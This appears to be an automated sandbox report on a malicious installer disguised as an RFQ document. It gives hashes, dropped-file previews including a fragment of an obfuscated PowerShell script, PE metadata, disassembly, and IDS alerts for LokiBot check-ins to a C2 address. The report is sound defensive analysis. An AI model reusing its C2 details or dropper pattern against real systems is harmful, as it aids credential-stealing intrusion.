SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjlhnjp.qwc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qr5yvafi.dw1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Behandlingsmaal.sac

Download File

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	data
Category:	dropped
Size (bytes):	341995
Entropy (8bit):	0.681328297606635
Encrypted:	false
SSDEEP:	768:YYv2jfcXjveUx72Yj7X5I7TO8Cr6qgLE89h3R71p6qRfOU0Ane1k9M/qlvFNLxI:B5jnc3
MD5:	F8C0FEE8DE3E2F93E8EA22388A77BB09
SHA1:	9BBA5C653A1A83A35EB65CBCA505C659C59662B5
SHA-256:	DED32062860DB523C6436B432F22EE503F7706DCCD75BA2825A4470D58C1412D
SHA-512:	2FCD5EB3BBC0BD881FC4C8E271B233851A2C1B39F8E6DB7CD937005C1A1D0AC2F8C1219CBFAEAD1F70D13D3A7E1C8ACB79297AD9EFA8F3289591A022EB34338B
Malicious:	false
Preview:	...................................................................v.............................,..............................................]..........................................................................................................(....................................4...................................................t8................................................................ ..................................................4n.................................................................}..................................E...........................................................................................................................................................q.............5....U................>e.............................:.........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Kliniklokalernes.sun

Download File

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	data
Category:	dropped
Size (bytes):	401860
Entropy (8bit):	0.6832204695585447
Encrypted:	false
SSDEEP:	768:uPDccdaFpHi7QWY7vVTnSy0DwPh3PY0YVcf0aVr+LBgaP1mbQZk2hD+FyqYhyNBR:kTOnd1NOBp9
MD5:	21D2EBDF40706EC8FC35650094126A9A
SHA1:	53519EC395F2E3FC49D97216FB54A9A0088A851F
SHA-256:	92CC335F5AAA5F481ED32B10F95853A4D478BE368F9FEDDC20F6B7731923D066
SHA-512:	B648C3934055358CB18DCE32A8459E5475B82C8EAC011528E7DA4C4D1573D680672D275CFB78E6DA26FB40FF72DFB31DD94C91611874D1A79E255B1B074ABE4D
Malicious:	false
Preview:	..........................................................................................................%....................................................O.................................................................;....s.....o................................................b..............*.............................................................................O.....Z.........................................................................................................:...................................L.......................................................................................................................e.....................................e.......................................,......................................................................3............l....................................................!...................................................8.....................................................~.............................?..

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Potatory.rea

Download File

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	FoxPro FPT, blocks size 16640, next free block index 173, field type 0
Category:	dropped
Size (bytes):	276346
Entropy (8bit):	0.6771300916913716
Encrypted:	false
SSDEEP:	768:50QftKJWNEsYKIleNCcQySVfmGhwwFp7L9jRspT56:zhO7Q
MD5:	B140848A979AA1806772DAB19A298710
SHA1:	7A7107A4839F01C3AA087212763E93ECD7904A21
SHA-256:	05D0F6C869793EF28EE232A704382092E71FA20B9B1A33D39DE36C374967F903
SHA-512:	A3CAE2CE90C61B08143C47774DBE8ECA90FBF748F986CA5F0ECBF140F29C57EA50093D12AF65B0D565755D4A50F8202EDC8FA8A828481C85791E30854C5AEF9E
Malicious:	false
Preview:	......A...........................G...............................t...................................................}...........................................................^...........S.............................................................................................................#...................w.........................................A...................................................................g...................................................+........................................................................y...............]..............-..............................................$.................0..................................................w......v...............................................b.................&.........?....................................B.......................................................................................................................................................8..................\|......

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	663136
Entropy (8bit):	7.703723996243989
Encrypted:	false
SSDEEP:	12288:IgXRAvufNFTr7L6GJpk/0C+wEc80Qu8j4RmYxrqwDwmuu6TNxFu+b:jXRyUNJr7L5vBC5ummYxrPqu6hxFu+
MD5:	90FDA5C072FE00E8E737606ADD7F1276
SHA1:	68752DCE786A29B815EC5454D4B4AA5F6BC73363
SHA-256:	C384D26E83F585FBADD73E6CEA441D1479D68DE5BB647F775B506E5EAB7F3230
SHA-512:	DF854AC565C084D47BC20E738EE8F36CF040D33FC2B7CB7C8AB84A83B2D77308B522ECCD81E23E576BB9F82BF1EA00A50F33435522D8D2070923DE0A862A2512
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 10%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...c.d.................f...".......4............@.................................0_....@.......................................... ...............................................................................................................text...Ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Reluktansernes.Ove71

Download File

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	data
Category:	dropped
Size (bytes):	345115
Entropy (8bit):	7.691070647291503
Encrypted:	false
SSDEEP:	6144:FAFgQ39889Ah6x5gR7+OlnOdxuqt7zR2cfrSG+GBvIzXn6VZ9fMF:G+Q3rCsx5UHa3R2gJIDy98
MD5:	771717ADD10395B56C27056035A7F725
SHA1:	BFA26B09A632998866E235C13C9859B4D4984236
SHA-256:	07EECF0B61AF3A50E22D08856F08E23B6B7ED731BF1E8965525A3B9C39ACFF5B
SHA-512:	CB68C1E0553BE1CCEEC312B487F794252B46393D767A079591DCA246D2F7820BF55602613ECF621E315476F7C781B0D63DB7DEBA1AF4877B2A1446534B975D4D
Malicious:	false
Preview:	.........u......J.........J...:......dd.a.....%..................G.999......t.t.j...kkkk.........?...........ccc.....0..VVV........................"..............................K......................n..$......HHH......I.......................................................>....k.........l......................*.YY.......CCCC...........)........www.........:...............^........m.....3..........NNN..........."....8.................<...WWWWW.......mmmm............]]..................x......V...............U...................xx.........Q.SSSS...................OO.....;;;.............GG...............>>>...$.UUU.T....j.......".......222..LL....................p.........,,..............W..........Y.....................................\|\|...\|\|\|\|\|................K.................................///........."""....-.............................IIIII........D......H.........i..bb.4._......d......j.ppp.......ttt.....jj.22...!.........................))........uuuu.......].................

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd

Download File

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	ASCII text, with very long lines (61450), with no line terminators
Category:	dropped
Size (bytes):	61450
Entropy (8bit):	5.331903225465815
Encrypted:	false
SSDEEP:	1536:FNKL+KTusOLdVQxd5B+n51ZPsXb7VZcrq/qhgPqpba5Znn:FNsl9Ud2u1ZP87ViQSpyBn
MD5:	8418CA27CC3391358049989E80076A60
SHA1:	0CA1BAE9DFABAE917324AF7337D1ED8C2B6001AA
SHA-256:	8559F472B29A2D1DE1124B1B2AA6D62558B1207A3910048D77B9BB07501E3733
SHA-512:	B6EE3A45200B5F218520C38FBDE6B6A30E4F2E847EA890ACE3B37A38B14F2C26EE12F21C350052336C67AC725233F1E5B65B1D0B5A4343EF0FCA50214B96C01F
Malicious:	true
Preview:	$udsmuglingerneppendicle=$Unstoneable;<#Unadorable Papingo Euthanatize #><#Folketingstidende Foreimagination Enfroward Symphyta Afprvningsprocedurernes Ondskabsfuldest #><#Halbarad Driftsbesparelses Noncoercion Arbejdsudygtighedernes Bandets Attorneyism #><#Linjesorteringerne Hjerteanfalds Philippas scrapbger fotografiapparaternes #><#Inspirogr Fossillike Beboelseslejligheders Steeves Drivgarnsfiskeriernes Shawing Henslngtes #><#Pelle Videns Circumspection midnightly protohemipterous Afriver Kirghiz #><#Jekaterinas Ununiting Unwater Unconciliable #><#Lysbilledapparaternes Oncogenicity Draffy hia Papirpressers Slikkepinden #><#Supersanguinity Jemina rumperemmenes #><#Unrubbed Majid picknicker Overtorture Bagganet Chromiferous #><#Apicillary Posninger Konkylje Afgaaende Kapslens Puggaree Brugtbilsforhandleren #><#Horizonless Decimator Maanen Mushiness Vyase #><#Lemure Masselagringerne Annekteringernes Upaavirkeligheden Salarying Hominization Amfora #><#Tuply Gentilitial Pathfind Adhered

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\teda.txt

Download File

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	577
Entropy (8bit):	4.301168552637842
Encrypted:	false
SSDEEP:	12:tTJklkinFJosMjZ+Ez6QlGWAwfHQtpkKBUCBdvweUgo7SOHTMPgdWgQly:tqlkIvMqgXAwvGkKm4dvwjj7TTMPgUgR
MD5:	5DA9127F07E748B0DA6767B10C087270
SHA1:	B3DD5A50677E6CC6C9923FDBE4FB4D3A1FD21707
SHA-256:	420647E422B79E2DAED389A252880CC5F8685A1A04C5AB6537C2712818284CBD
SHA-512:	0F6161B9F14C0633992593A4F0E86DE3DA3B56F975AF1A25A59D6790ED590A934256807787967265968E299B1C32AF8BC0A2EC2CA200713678028FC960049446
Malicious:	false
Preview:	bacillebrerens background friskmaledes tysket broidery miasmatize permutationists handlekraftigstes vauntie postekspeditions..forbrugslyst unbulled unfrigidness svaje candyflosser tildelingen.grnttorv freeloader fuges plasticposens grafbasen cuculliform brudepigers endovasculitis lutrinae begoniaceous membraneous..signifikantes traekvogne ordrende bitestiklerne pastelfarvet,argons rotundas sortmejserne milieuteknikeres fuldgyldige.leaders ryme nedre telefonplen fugtighedskremen lensaftalen sulphoichthyolate purselike polyphyletically binomialformlens oprenset puntabout..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.703723996243989
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ-SulselBarruII2-COALCOMMLDOC.exe
File size:	663'136 bytes
MD5:	90fda5c072fe00e8e737606add7f1276
SHA1:	68752dce786a29b815ec5454d4b4aa5f6bc73363
SHA256:	c384d26e83f585fbadd73e6cea441d1479d68de5bb647f775b506e5eab7f3230
SHA512:	df854ac565c084d47bc20e738ee8f36cf040d33fc2b7cb7c8ab84a83b2d77308b522eccd81e23e576bb9f82bf1ea00a50f33435522d8d2070923de0a862a2512
SSDEEP:	12288:IgXRAvufNFTr7L6GJpk/0C+wEc80Qu8j4RmYxrqwDwmuu6TNxFu+b:jXRyUNJr7L5vBC5ummYxrPqu6hxFu+
TLSH:	E3E4DF9BA784F56BE1767F70EAE2D5F03B607C2DE418224F62503DC93EB29618A7410D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....

File Icon


Icon Hash:	030379471c736f3f

Static PE Info

General

Entrypoint:	0x4034fc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Underdirektoriet@Trangsvurderings.Bo, O=cradlefellow, OU="Minutise Fragtmnds ", CN=cradlefellow, L=Macheren, S=Grand Est, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	26/01/2024 02:48:24 25/01/2027 02:48:24
Subject Chain	E=Underdirektoriet@Trangsvurderings.Bo, O=cradlefellow, OU="Minutise Fragtmnds ", CN=cradlefellow, L=Macheren, S=Grand Est, C=FR
Version:	3
Thumbprint MD5:	7E4D04DD3CC1B0E2C959CA6BE5050F20
Thumbprint SHA-1:	61AFE5027EE822137182F138A7175FE187F5F9E8
Thumbprint SHA-256:	A7C08AF56FF9717B74A8AEAE7BC49A3E14D72BC18EDAFFEB7C94B1151123AF60
Serial:	06D690BDA534CABAB35203D8181C4EF4E3ECBD6A

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F5D887B9D4Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F5D887B9D18h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x2e9a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa05d8	0x1888
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6556	0x6600	dd25e171f2e0fe45f2800cc9e162537d	False	0.6652113970588235	data	6.456753840355455	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb38	0x600	2bc02714ee74ba781d92e94eeaccb080	False	0.501953125	data	4.040639308682379	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x38000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x62000	0x2e9a8	0x2ea00	c7eb0f26efb41c8ea05c23299c33d374	False	0.6402060991957105	data	6.570856112111514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x62448	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2494380693245002
RT_ICON	0x72c70	0xadc2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9930758509059845
RT_ICON	0x7da38	0x8afc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9889263631253513
RT_ICON	0x86538	0x3911	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9775480867958108
RT_ICON	0x89e50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3211618257261411
RT_ICON	0x8c3f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3674953095684803
RT_ICON	0x8d4a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.511727078891258
RT_ICON	0x8e348	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.6227436823104693
RT_ICON	0x8ebf0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.40487804878048783
RT_ICON	0x8f258	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4263005780346821
RT_ICON	0x8f7c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5372340425531915
RT_ICON	0x8fc28	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.5067204301075269
RT_ICON	0x8ff10	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.6756756756756757
RT_DIALOG	0x90038	0x100	data	English	United States	0.5234375
RT_DIALOG	0x90138	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x90258	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x90320	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x90380	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0x90440	0x224	data	English	United States	0.5145985401459854
RT_MANIFEST	0x90668	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/03/24-06:38:05.256073	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49789	80	192.168.2.4	104.21.13.124
04/03/24-06:38:13.658001	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49800	80	192.168.2.4	104.21.13.124
04/03/24-06:38:07.360242	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49792	80	192.168.2.4	104.21.13.124
04/03/24-06:37:41.484457	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.987496	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.282252	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49827	80	192.168.2.4	104.21.13.124
04/03/24-06:38:26.534492	TCP	2025381	ET TROJAN LokiBot Checkin	49816	80	192.168.2.4	104.21.13.124
04/03/24-06:38:48.379699	TCP	2025381	ET TROJAN LokiBot Checkin	49844	80	192.168.2.4	104.21.13.124
04/03/24-06:38:38.419517	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49833	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.987496	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.4	104.21.13.124
04/03/24-06:38:10.724952	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49796	80	192.168.2.4	104.21.13.124
04/03/24-06:38:36.358340	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49830	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.122189	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.4	104.21.13.124
04/03/24-06:38:55.534565	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49854	80	192.168.2.4	104.21.13.124
04/03/24-06:37:30.613047	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.4	104.21.13.124
04/03/24-06:38:38.419517	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49833	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.219175	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49855	80	192.168.2.4	104.21.13.124
